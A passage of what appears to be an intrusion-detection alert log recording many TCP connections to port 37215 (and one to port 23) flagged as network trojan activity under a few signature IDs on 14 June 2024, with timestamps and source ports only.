                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829008
                SID:2829579
                Source Port:39710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568347
                SID:2829579
                Source Port:40004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.085265
                SID:2835222
                Source Port:57476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807275
                SID:2829579
                Source Port:43556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791885
                SID:2835222
                Source Port:37254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071921
                SID:2829579
                Source Port:57632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703533
                SID:2829579
                Source Port:56068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677881
                SID:2829579
                Source Port:49798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614118
                SID:2829579
                Source Port:47352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383006
                SID:2829579
                Source Port:49234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723313
                SID:2829579
                Source Port:53062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143270
                SID:2835222
                Source Port:50240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828251
                SID:2835222
                Source Port:41398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700495
                SID:2835222
                Source Port:41980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201359
                SID:2835222
                Source Port:40700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519490
                SID:2835222
                Source Port:46846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966055
                SID:2829579
                Source Port:57102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054602
                SID:2829579
                Source Port:46008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916575
                SID:2829579
                Source Port:56468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023054
                SID:2829579
                Source Port:45360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146127
                SID:2829579
                Source Port:45798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567550
                SID:2829579
                Source Port:57750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412248
                SID:2835222
                Source Port:39266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410798
                SID:2835222
                Source Port:34346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453201
                SID:2835222
                Source Port:36244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151795
                SID:2835222
                Source Port:52864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229886
                SID:2829579
                Source Port:39650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779891
                SID:2829579
                Source Port:40632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860637
                SID:2835222
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985738
                SID:2829579
                Source Port:50066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716765
                SID:2829579
                Source Port:51176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813311
                SID:2829579
                Source Port:46284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806558
                SID:2835222
                Source Port:42924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086249
                SID:2835222
                Source Port:43754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811399
                SID:2829579
                Source Port:51902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199888
                SID:2829579
                Source Port:56248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228162
                SID:2835222
                Source Port:41606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405275
                SID:2835222
                Source Port:41850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054318
                SID:2835222
                Source Port:32970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148764
                SID:2835222
                Source Port:35274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504222
                SID:2829579
                Source Port:38260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980305
                SID:2835222
                Source Port:45094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704960
                SID:2835222
                Source Port:36086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517362
                SID:2829579
                Source Port:57594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985644
                SID:2829579
                Source Port:48886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149474
                SID:2829579
                Source Port:45010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.760867
                SID:2835222
                Source Port:60466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676029
                SID:2829579
                Source Port:37366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762000
                SID:2835222
                Source Port:42164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850017
                SID:2835222
                Source Port:47664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763168
                SID:2835222
                Source Port:45708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082407
                SID:2835222
                Source Port:56576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944008
                SID:2829579
                Source Port:54502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366059
                SID:2835222
                Source Port:37992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151146
                SID:2835222
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343390
                SID:2835222
                Source Port:39096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.935138
                SID:2829579
                Source Port:59600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143107
                SID:2835222
                Source Port:58182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944692
                SID:2835222
                Source Port:57616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965603
                SID:2829579
                Source Port:56020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543051
                SID:2829579
                Source Port:59660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969427
                SID:2835222
                Source Port:58812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792122
                SID:2835222
                Source Port:37624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847454
                SID:2829579
                Source Port:55552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150815
                SID:2835222
                Source Port:51660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761666
                SID:2835222
                Source Port:45110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182326
                SID:2835222
                Source Port:34940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:33.673512
                SID:2840515
                Source Port:49610
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565806
                SID:2829579
                Source Port:41102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179807
                SID:2829579
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423514
                SID:2829579
                Source Port:34738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504131
                SID:2829579
                Source Port:48138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383590
                SID:2829579
                Source Port:41652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617293
                SID:2829579
                Source Port:49680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224413
                SID:2835222
                Source Port:40088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662245
                SID:2835222
                Source Port:51920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053941
                SID:2829579
                Source Port:59834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181853
                SID:2835222
                Source Port:44346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322576
                SID:2829579
                Source Port:48660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424470
                SID:2835222
                Source Port:49682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369245
                SID:2829579
                Source Port:33660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718865
                SID:2835222
                Source Port:35176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201844
                SID:2835222
                Source Port:52720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326645
                SID:2835222
                Source Port:49204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736341
                SID:2829579
                Source Port:48576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000097
                SID:2835222
                Source Port:42016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054645
                SID:2835222
                Source Port:57354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765755
                SID:2829579
                Source Port:59144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131190
                SID:2835222
                Source Port:44056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809527
                SID:2829579
                Source Port:45220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150384
                SID:2835222
                Source Port:47262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014899
                SID:2829579
                Source Port:45568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999881
                SID:2835222
                Source Port:33000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291179
                SID:2829579
                Source Port:45122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966975
                SID:2835222
                Source Port:59862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176649
                SID:2829579
                Source Port:53306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185810
                SID:2835222
                Source Port:44328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151299
                SID:2835222
                Source Port:34722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676514
                SID:2829579
                Source Port:52430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021881
                SID:2835222
                Source Port:47862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183732
                SID:2829579
                Source Port:46810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830431
                SID:2829579
                Source Port:40430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805599
                SID:2835222
                Source Port:38890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146097
                SID:2829579
                Source Port:55214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082171
                SID:2829579
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186431
                SID:2829579
                Source Port:46936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245739
                SID:2835222
                Source Port:40524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200127
                SID:2835222
                Source Port:39536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789788
                SID:2829579
                Source Port:60726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030269
                SID:2829579
                Source Port:34994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971201
                SID:2829579
                Source Port:43432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932967
                SID:2829579
                Source Port:33648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274787
                SID:2835222
                Source Port:38666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421406
                SID:2829579
                Source Port:45440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544979
                SID:2829579
                Source Port:36536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000588
                SID:2835222
                Source Port:38654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861256
                SID:2835222
                Source Port:35918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200894
                SID:2829579
                Source Port:37702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850555
                SID:2835222
                Source Port:32790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052759
                SID:2829579
                Source Port:60226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905240
                SID:2835222
                Source Port:33746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470410
                SID:2835222
                Source Port:57822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185782
                SID:2835222
                Source Port:49350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202512
                SID:2835222
                Source Port:41112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072932
                SID:2835222
                Source Port:45494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277293
                SID:2835222
                Source Port:60988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643734
                SID:2829579
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001335
                SID:2835222
                Source Port:33294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581705
                SID:2835222
                Source Port:40402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501825
                SID:2829579
                Source Port:39882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337758
                SID:2829579
                Source Port:60400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717280
                SID:2835222
                Source Port:51520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365850
                SID:2835222
                Source Port:44818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547936
                SID:2835222
                Source Port:56312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543765
                SID:2835222
                Source Port:45874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858384
                SID:2829579
                Source Port:41290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716430
                SID:2835222
                Source Port:51242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470345
                SID:2829579
                Source Port:43482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420930
                SID:2829579
                Source Port:43874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014268
                SID:2835222
                Source Port:54502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860808
                SID:2835222
                Source Port:59988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683248
                SID:2835222
                Source Port:59214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847670
                SID:2829579
                Source Port:49530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985111
                SID:2829579
                Source Port:45232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718533
                SID:2835222
                Source Port:47636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161389
                SID:2829579
                Source Port:39114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968803
                SID:2829579
                Source Port:58956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.090861
                SID:2835222
                Source Port:43950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419619
                SID:2835222
                Source Port:47416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804581
                SID:2829579
                Source Port:44996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846621
                SID:2835222
                Source Port:45734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452672
                SID:2829579
                Source Port:38000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505365
                SID:2829579
                Source Port:55804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986053
                SID:2829579
                Source Port:58876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678602
                SID:2829579
                Source Port:33360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054989
                SID:2829579
                Source Port:33700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987994
                SID:2829579
                Source Port:48918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618164
                SID:2829579
                Source Port:39200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054082
                SID:2835222
                Source Port:52640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548364
                SID:2835222
                Source Port:53192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422200
                SID:2835222
                Source Port:43126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053463
                SID:2829579
                Source Port:51128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131466
                SID:2829579
                Source Port:40096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932854
                SID:2829579
                Source Port:60280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763452
                SID:2829579
                Source Port:54094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723904
                SID:2835222
                Source Port:44974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420093
                SID:2829579
                Source Port:57024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502384
                SID:2835222
                Source Port:33666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808667
                SID:2829579
                Source Port:45650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980869
                SID:2829579
                Source Port:48240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183300
                SID:2835222
                Source Port:35840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.254018
                SID:2829579
                Source Port:42846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143302
                SID:2835222
                Source Port:50844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676488
                SID:2835222
                Source Port:42064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322629
                SID:2829579
                Source Port:39750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145902
                SID:2829579
                Source Port:45268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860242
                SID:2829579
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340349
                SID:2835222
                Source Port:59674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368148
                SID:2835222
                Source Port:42040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149406
                SID:2835222
                Source Port:50162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091201
                SID:2829579
                Source Port:56736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549054
                SID:2829579
                Source Port:49256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408296
                SID:2835222
                Source Port:36678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010288
                SID:2835222
                Source Port:33866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151421
                SID:2829579
                Source Port:46842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471501
                SID:2835222
                Source Port:34828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250855
                SID:2829579
                Source Port:54916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179003
                SID:2835222
                Source Port:41162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966535
                SID:2835222
                Source Port:57916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761900
                SID:2835222
                Source Port:34544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858099
                SID:2835222
                Source Port:46092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325408
                SID:2835222
                Source Port:38972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898278
                SID:2835222
                Source Port:35812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898361
                SID:2829579
                Source Port:42424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131382
                SID:2835222
                Source Port:34372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679627
                SID:2835222
                Source Port:43048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942195
                SID:2835222
                Source Port:43868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
